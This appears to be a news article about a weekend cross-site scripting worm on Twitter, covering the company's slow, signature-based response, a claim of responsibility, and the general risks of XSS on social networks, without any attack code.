Twitter was hit over the weekend by powerful, self-replicating attacks that caused people to flood the micro-blogging site with tens of thousands of messages simply by viewing booby trapped user profiles.
As is frequently the case with XSS-based attacks, the worm was unable to prey on those using the NoScript add-on for the Firefox browser.
Twitter's security team was able to block the attack for a while, but a new assault that made use of "mildly obfuscated" code soon defeated the countermeasure, raising the possibility that it was based on the detection of attack signatures rather than fixing the underlying bug that allowed the XSS vulnerability in the first place.
"The existence of a mildly obfuscated version authorizes a scary suspect: have Twitter guys just been trying to block the original strain by signature, rather than fixing their website error?" Italian researcher and NoScript creator Giorgio Maone wrote here. "This would be ridiculous, since any script kiddie can create his own slightly modified version for fun or profit (and is probably doing that)."
It's not the first time Twitter has been slow to react to vulnerabilities on its site that allow self-replicating attacks against its users. The San Francisco-based company took more than 24 hours to close a separate hole discovered by white-hat hackers last month, while many of the company's employees attended the South by South West conference in Austin, Texas.
"We are still reviewing all the details, cleaning up, and we remain on alert," Twitter co-founder Biz Stone wrote Sunday. "Every time we battle an attack, we evaluate our web coding practices to learn how we can do better to prevent them in the future."
Stone declined to answer questions including exactly what changes it planned and how many accounts were infected. He also wouldn't say whether Twitter officials had alerted the FBI or other law-enforcement authorities.
The weekend attacks are reminiscent of other XSS-born worms that have menaced the web. The most notorious of those was the Samy worm of 2005, which knocked MySpace out of commission when it added more than one million MySpace friends to a user named Samy. The author was later convicted.
An individual has claimed responsibility for the Twitter attacks, saying here he created the worm "out of boredom". His identity and claims could not be immediately confirmed.
If you think worms on social networking sites are harmless you should think again. Twitter in particular has become a platform for countless companies, organizations and celebrities to share updates with followers who blindly click on any link provided. The attacks so far have been innocuous only because the attackers have lacked sufficient malice.
XSS attacks are serious because they allow miscreants to inject their code of choice into websites that are trusted by millions of users. In turn, attackers can perform drive-by malware installations or steal authentication cookies and other log-in credentials.
And that's just the beginning. As the Dcortesi blog states:
Until Twitter can give better assurances about its procedures for keeping its considerable user base safe from attack, you may want to think twice about clicking on links and user profiles, even when they appear to come from people you know and trust. The site is in the middle of an arms race, and so far it's not at all clear who has the upper hand. ®